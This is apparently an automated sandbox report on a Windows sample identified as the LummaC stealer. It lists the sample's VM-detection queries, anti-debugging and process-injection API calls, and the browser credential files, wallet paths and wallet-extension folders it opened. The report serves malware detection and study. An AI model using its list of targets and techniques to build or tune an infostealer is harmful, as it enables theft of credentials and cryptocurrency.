Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00ABB6D2	2_2_00ABB6D2
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00AA76D0	2_2_00AA76D0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00AB8630	2_2_00AB8630
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00A74600	2_2_00A74600
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00A71660	2_2_00A71660
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00A8A670	2_2_00A8A670
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00A91E40	2_2_00A91E40
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00A5B650	2_2_00A5B650
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00A84E50	2_2_00A84E50
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00AB8E50	2_2_00AB8E50
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00A7E7A0	2_2_00A7E7A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00A927A0	2_2_00A927A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00AACF80	2_2_00AACF80
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00A5E7E0	2_2_00A5E7E0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00A8B7F0	2_2_00A8B7F0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00A78FC0	2_2_00A78FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00AA4710	2_2_00AA4710
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00A5DF70	2_2_00A5DF70
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00AA6770	2_2_00AA6770
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00AAEF40	2_2_00AAEF40
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00A6C750	2_2_00A6C750
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00A83750	2_2_00A83750

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00AC8BF4 appears 34 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00ABBBE0 appears 96 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 0041A420 appears 110 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 0040B380 appears 46 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00AC3E4C appears 44 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: .bss ZLIB complexity 1.0003352171985815

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/0@2/1

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_00443C30 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

2_2_00443C30

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6264:120:WilError_03

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000002.00000003.1301944750.0000000003445000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1336108292.0000000003442000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1335802583.000000000344F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1302438770.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe	Virustotal: Detection: 43%
Source: file.exe	ReversingLabs: Detection: 42%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ABBD9A push ecx; ret	0_2_00ABBDAD
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004540A0 push 8B0042B4h; retn 0042h	2_2_004540A5
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00450B6B push esp; ret	2_2_00450B72
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0045054A push edx; ret	2_2_0045054D
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004525D2 push esp; retf	2_2_004525D5
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0045059B push ecx; ret	2_2_004505F2
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00ABBD9A push ecx; ret	2_2_00ABBDAD

Source: file.exe

Static PE information: section name: .text entropy: 7.102077354688428

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 6456	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6460	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ACDAAE FindFirstFileExW,	0_2_00ACDAAE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ACDB5F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00ACDB5F
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00ACDAAE FindFirstFileExW,	2_2_00ACDAAE
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00ACDB5F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00ACDB5F

Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000002.00000002.1499919477.0000000000E60000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1398662498.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1453123419.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: file.exe, 00000002.00000003.1336372026.0000000003475000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: file.exe, 00000002.00000003.1498983195.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1499854902.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1499258321.0000000000E2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX8
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: file.exe, 00000002.00000003.1336372026.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_00449660 LdrInitializeThunk,

2_2_00449660

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00ABBA66 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00ABBA66

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00AE41B4 mov edi, dword ptr fs:[00000030h]

0_2_00AE41B4

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00AC94EC GetProcessHeap,

0_2_00AC94EC

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ABBA66 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00ABBA66
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ABBA5A SetUnhandledExceptionFilter,	0_2_00ABBA5A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC3B9E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00AC3B9E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ABB6AA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00ABB6AA
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00ABBA66 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00ABBA66
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00AC3B9E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00AC3B9E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00ABB6AA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00ABB6AA

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00AE41B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_00AE41B4

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00AC88DC
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00ACD069
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00ACD104
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00ACD3B6
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00ACD357
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00ACD48B
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00ACD4D6
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00AC8DD7
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00ACD57D
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00ACD683
Source: C:\Users\user\Desktop\file.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00ACCE18
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	2_2_00AC88DC
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	2_2_00ACD069
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_00ACD104
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	2_2_00ACD3B6
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	2_2_00ACD357
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	2_2_00ACD48B
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	2_2_00ACD4D6
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	2_2_00AC8DD7
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_00ACD57D
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	2_2_00ACD683
Source: C:\Users\user\Desktop\file.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_00ACCE18

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00ABC4A7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00ABC4A7

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: file.exe, 00000002.00000003.1499258321.0000000000E44000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1499854902.0000000000E44000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1474539208.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1453123419.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1499423252.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1270512727.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000002.00000003.1398662498.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: file.exe, 00000002.00000003.1398933075.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: file.exe, 00000002.00000003.1398662498.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000002.00000003.1398933075.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: file.exe, 00000002.00000003.1398933075.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: file.exe, 00000002.00000003.1396439956.0000000000F08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: file.exe, 00000002.00000003.1398933075.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: file.exe, 00000002.00000003.1498948316.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: file.exe, 00000002.00000003.1398662498.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
